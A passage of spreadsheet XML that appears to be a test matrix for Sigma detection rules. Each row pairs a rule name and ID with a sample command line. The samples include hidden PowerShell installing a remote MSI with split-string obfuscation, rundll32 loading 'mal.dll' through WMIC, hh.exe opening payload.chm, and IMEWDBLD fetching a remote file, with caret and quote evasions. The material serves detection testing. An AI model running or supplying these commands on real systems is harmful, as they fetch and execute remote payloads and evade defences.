      <c r="B926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C926" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D926" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E926" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I926" s="43" t="n"/>
      <c r="J926" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="927" ht="15.75" customHeight="1" s="42">
      <c r="A927" s="43" t="n"/>
      <c r="B927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C927" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D927" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E927" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I927" s="44" t="n"/>
      <c r="J927" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="928" ht="15.75" customHeight="1" s="42">
      <c r="A928" s="43" t="n"/>
      <c r="B928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C928" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D928" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E928" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I928" s="44" t="n"/>
      <c r="J928" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="929" ht="15.75" customHeight="1" s="42">
      <c r="A929" s="43" t="inlineStr">
        <is>
          <t>t1204.004</t>
        </is>
      </c>
      <c r="B929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_filefix_browsers</t>
        </is>
      </c>
      <c r="C929" s="44" t="inlineStr">
        <is>
          <t>FileFix - Suspicious Child Process from Browser File Upload Abuse</t>
        </is>
      </c>
      <c r="D929" s="44" t="inlineStr">
        <is>
          <t>4be03877-d5b6-4520-85c9-a5911c0a656c</t>
        </is>
      </c>
      <c r="E929" s="44" t="inlineStr">
        <is>
          <t>file:///C:/Windows/explorer.exe#"C:\Windows\System32\cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I929" s="43" t="n"/>
      <c r="J929" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="930" ht="15.75" customHeight="1" s="42">
      <c r="A930" s="43" t="n"/>
      <c r="B930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C930" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D930" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E930" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I930" s="43" t="n"/>
      <c r="J930" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="931" ht="15.75" customHeight="1" s="42">
      <c r="A931" s="43" t="n"/>
      <c r="B931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C931" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D931" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E931" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I931" s="43" t="n"/>
      <c r="J931" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="932" ht="15.75" customHeight="1" s="42">
      <c r="A932" s="43" t="n"/>
      <c r="B932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C932" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D932" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E932" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I932" s="43" t="n"/>
      <c r="J932" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="933" ht="15.75" customHeight="1" s="42">
      <c r="A933" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C933" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D933" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E933" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" h""ttps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)</t>
        </is>
      </c>
      <c r="F933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I933" s="43" t="n"/>
      <c r="J933" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="934" ht="15.75" customHeight="1" s="42">
      <c r="A934" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C934" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D934" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E934" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)"</t>
        </is>
      </c>
      <c r="F934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I934" s="43" t="n"/>
      <c r="J934" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="935" ht="15.75" customHeight="1" s="42">
      <c r="A935" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C935" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D935" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E935" s="44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F935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I935" s="43" t="n"/>
      <c r="J935" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="936" ht="15.75" customHeight="1" s="42">
      <c r="A936" s="44" t="n"/>
      <c r="B936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C936" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D936" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E936" s="4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936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I936" s="44" t="n"/>
      <c r="J936" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="937" ht="15.75" customHeight="1" s="42">
      <c r="A937" s="43" t="n"/>
      <c r="B937" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C937" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D937" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E937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937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H937" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I937" s="43" t="n"/>
      <c r="J937" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K937" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="938" ht="15.75" customHeight="1" s="42">
      <c r="A938" s="43" t="n"/>
      <c r="B938" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C938" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D938" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E938" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H938" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I938" s="43" t="n"/>
      <c r="J938" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K938" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="939" ht="15.75" customHeight="1" s="42">
      <c r="A939" s="44" t="n"/>
      <c r="B939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C939" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D939" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E939" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H939" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I939" s="43" t="n"/>
      <c r="J939" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K939" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="940" ht="15.75" customHeight="1" s="42">
      <c r="A940" s="43" t="n"/>
      <c r="B940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C940" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D940" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E940" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I940" s="44" t="n"/>
      <c r="J940" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K940" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="941" ht="15.75" customHeight="1" s="42">
      <c r="A941" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C941" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D941" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E941" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I941" s="44" t="n"/>
      <c r="J941" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K941" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="942" ht="15.75" customHeight="1" s="42">
      <c r="A942" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C942" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D942" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E942" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I942" s="43" t="n"/>
      <c r="J942" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K942" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="943" ht="15.75" customHeight="1" s="42">
      <c r="A943" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C943" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D943" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E943" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I943" s="43" t="n"/>
      <c r="J943" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K943" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="944" ht="15.75" customHeight="1" s="42">
      <c r="A944" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C944" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D944" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E944" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I944" s="43" t="n"/>
      <c r="J944" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K944" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="945" ht="15.75" customHeight="1" s="42">
      <c r="A945" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C945" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D945" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E945" s="44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F945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I945" s="44" t="n"/>
      <c r="J945" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K945" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="946" ht="15.75" customHeight="1" s="42">
      <c r="A946" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C946" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D946" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E946" s="44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46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I946" s="43" t="n"/>
      <c r="J946" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K946" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="947" ht="15.75" customHeight="1" s="42">
      <c r="A947" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C947" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D947" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E947" s="44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47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I947" s="43" t="n"/>
      <c r="J947" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K947" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="948" ht="15.75" customHeight="1" s="42">
      <c r="A948" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C948" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D948" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E948" s="44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48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I948" s="44" t="n"/>
      <c r="J948" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K948" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="949" ht="15.75" customHeight="1" s="42">
      <c r="A949" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B949" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C949" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D949" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E949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49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I949" s="43" t="n"/>
      <c r="J949" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K949" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="950" ht="15.75" customHeight="1" s="42">
      <c r="A950" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C950" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D950" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E950" s="44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50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I950" s="43" t="n"/>
      <c r="J950" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K950" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="951" ht="15.75" customHeight="1" s="42">
      <c r="A951" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C951" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D951" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E951" s="44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51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I951" s="43" t="n"/>
      <c r="J951" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K951" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="952" ht="15.75" customHeight="1" s="42">
      <c r="A952" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C952" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D952" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E952" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -COMmanD "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I952" s="43" t="n"/>
      <c r="J952" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K952" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="953" ht="15.75" customHeight="1" s="42">
      <c r="A953" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C953" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D953" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E953" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wiNDowStyLe Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I953" s="43" t="n"/>
      <c r="J953" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K953" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="954" ht="15.75" customHeight="1" s="42">
      <c r="A954" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C954" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D954" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E954" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I954" s="43" t="n"/>
      <c r="J954" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K954" s="44" t="b">
        <v>0</v>
      </c>
